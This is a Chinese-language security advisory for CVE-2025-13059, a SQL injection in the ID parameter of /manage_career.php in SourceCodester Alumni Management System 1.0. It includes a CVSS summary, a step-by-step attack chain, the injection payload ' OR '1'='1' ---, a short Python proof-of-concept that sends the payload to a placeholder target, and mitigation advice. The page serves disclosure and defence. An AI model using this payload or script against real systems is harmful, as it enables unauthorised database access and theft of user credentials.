CVE-2025-13059 SourceCodester Alumni Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13059

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Alumni Management System 1.0

漏洞概述

CVE-2025-13059是SourceCodester Alumni Management System 1.0版本中存在的一个中等严重性安全漏洞。该漏洞位于/manage_career.php文件中的ID参数，由于对用户输入参数缺乏充分的过滤和验证，攻击者可以通过构造恶意的SQL语句实现SQL注入攻击。远程攻击者可以在无需高权限的情况下利用此漏洞，通过Web界面直接对数据库执行未授权操作。该漏洞的CVSS评分为6.3，属于中等严重性级别，具有网络可达性、低攻击复杂度、低权限要求等特征。成功利用此漏洞可能导致敏感数据泄露、数据库内容篡改，甚至可能通过数据库进行进一步的系统渗透攻击。该漏洞的利用代码已在公开渠道发布，构成了实际的安全威胁。

技术细节

该SQL注入漏洞存在于SourceCodester Alumni Management System 1.0的/manage_career.php文件中，具体问题出在对ID参数的处理上。攻击者可以通过在ID参数中注入恶意构造的SQL语句来实现数据库操作。漏洞的利用方式为经典的基于错误的SQL注入或布尔盲注。攻击者需要具备低权限用户身份（如普通用户账户）即可发起攻击，无需特殊的系统访问权限。攻击向量为网络层面，攻击复杂度较低。由于缺乏参数化查询或适当的输入过滤，恶意SQL代码会被数据库服务器执行。成功利用后可能导致以下风险：1) 未经授权读取数据库中的敏感信息，包括用户凭证、个人数据等；2) 修改或删除数据库记录，影响系统数据的完整性；3) 在某些配置下可能实现远程代码执行或获取服务器操作权限。建议立即采取修复措施并评估系统日志以检测潜在的安全事件。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用SourceCodester Alumni Management System 1.0

STEP 2

步骤2

访问/manage_career.php端点并分析ID参数

STEP 3

步骤3

构造SQL注入Payload（如' OR '1'='1' ---）并提交请求

STEP 4

步骤4

利用数据库错误响应或时间延迟确认漏洞存在

STEP 5

步骤5

通过UNION SELECT或盲注技术提取数据库中的敏感信息

STEP 6

步骤6

获取用户凭证或其他敏感数据，可能导致进一步的系统入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13059 SQL Injection PoC
# Target: SourceCodester Alumni Management System 1.0
# File: /manage_career.php
# Parameter: ID

target_url = "http://target-site/manage_career.php"

# Basic authentication bypass payload
payload = "' OR '1'='1' ---"

try:
    params = {'id': payload}
    response = requests.get(target_url, params=params, timeout=10)
    
    print(f"[*] Sending malicious request to {target_url}")
    print(f"[*] Payload: {payload}")
    print(f"[*] Status Code: {response.status_code}")
    
    if response.status_code == 200:
        if 'sql' in response.text.lower() or 'error' in response.text.lower():
            print("[!] Potential SQL injection vulnerability confirmed!")
            print("[!] Server response contains SQL-related errors")
        else:
            print("[*] Request completed, check response for anomalies")
    
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")
    sys.exit(1)

影响范围

SourceCodester Alumni Management System 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 对/manage_career.php文件进行紧急修复，添加输入过滤逻辑；2) 限制对该页面的访问权限，仅允许授权用户访问；3) 部署WAF规则阻断SQL注入攻击特征；4) 加强对数据库的监控和日志审计，及时发现异常查询行为；5) 考虑暂时禁用/manage_career.php功能，待修复后重新启用。建议尽快关注官方安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13059
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13059
3 Details https://www.cvedetails.com/cve/CVE-2025-13059/
4 VulDB https://vuldb.com/cve/CVE-2025-13059
5 Link https://github.com/CaseyW33/CVE/issues/1
6 Link https://vuldb.com/?ctiid.332186
7 Link https://vuldb.com/?id.332186
8 Link https://vuldb.com/?submit.682548
9 Link https://www.sourcecodester.com/
10 Link https://github.com/CaseyW33/CVE/issues/1